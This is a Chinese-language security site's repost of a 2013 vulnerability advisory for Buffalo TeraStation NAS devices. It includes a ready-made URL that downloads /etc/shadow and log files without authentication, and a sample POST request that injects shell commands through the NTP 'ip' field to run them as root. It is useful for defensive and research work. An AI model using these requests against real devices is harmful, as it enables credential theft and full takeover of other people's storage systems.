当前位置: > Linux安全 >

Buffalo TeraStation dynamic.pl NTP命令注入漏洞

时间:2014-12-26 21:22来源:linux.it.net.cn 作者:IT

发布日期:2013-01-30
更新日期:2013-02-01

受影响系统:
buffalotech TeraStation
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 57634
 
Buffalo TeraStation NAS是集中式存储和备份解决方案。
 
Buffalo TeraStation TS系列在dynamic.pl的实现上存在NTP命令注入漏洞,已验证的用户可通过root权限在系统上执行任意命令。
 
<*来源:Andrea Fabrizi (andrea.fabrizi@gmail.com
   
  链接:http://seclists.org/fulldisclosure/2013/Jan/261?utm_source=twitterfeed&utm_medium=twitter
 *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
1]======== sync.cgi unauthenticated arbitrary file download ========
 Requesting an unprotected cgi, it's possible, for an unauthenticated
 user, to download any system file, included /etc/shadow, that contains
 the password shadows for the application/system users.
 
/cgi-bin/sync.cgi?gSSS=foo&gRRR=foo&gPage=information&gMode=log&gType=save&gKey=/etc/shadow
 
Moreover, using the key "all" it's possible to download the entire
 /var/log directory:
 
/cgi-bin/sync.cgi?gSSS=foo&gRRR=foo&gPage=information&gMode=log&gType=save&gKey=all
 
2]======== dynamic.pl NTP command injection ========
 This vulnerability allows authenticated users to execute arbitrary
 commands on the system with root privileges.
 
This is a sample request:
 #####################################
 POST /dynamic.pl HTTP/1.1
 Content-Length: 89
 Cookie: webui_session_admin=xxxxxxxxxxxxxxxxxxxxxx_en_0
 
bufaction=setDTSettings&dateMethod=on
 &ip=www.google.it%26%26[COMMAND]>/tmp/output
 &syncFreq=1d
 #####################################

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
buffalotech
 -----------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 
http://www.buffalotech.com/

(责任编辑:IT)
------分隔线----------------------------
栏目列表
推荐内容